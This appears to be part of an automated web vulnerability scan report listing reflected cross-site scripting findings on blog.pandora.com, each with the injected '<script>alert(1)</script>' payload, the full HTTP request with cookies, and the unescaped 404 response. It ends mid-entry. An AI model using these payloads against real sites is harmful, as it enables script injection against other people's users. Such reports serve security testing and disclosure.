HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
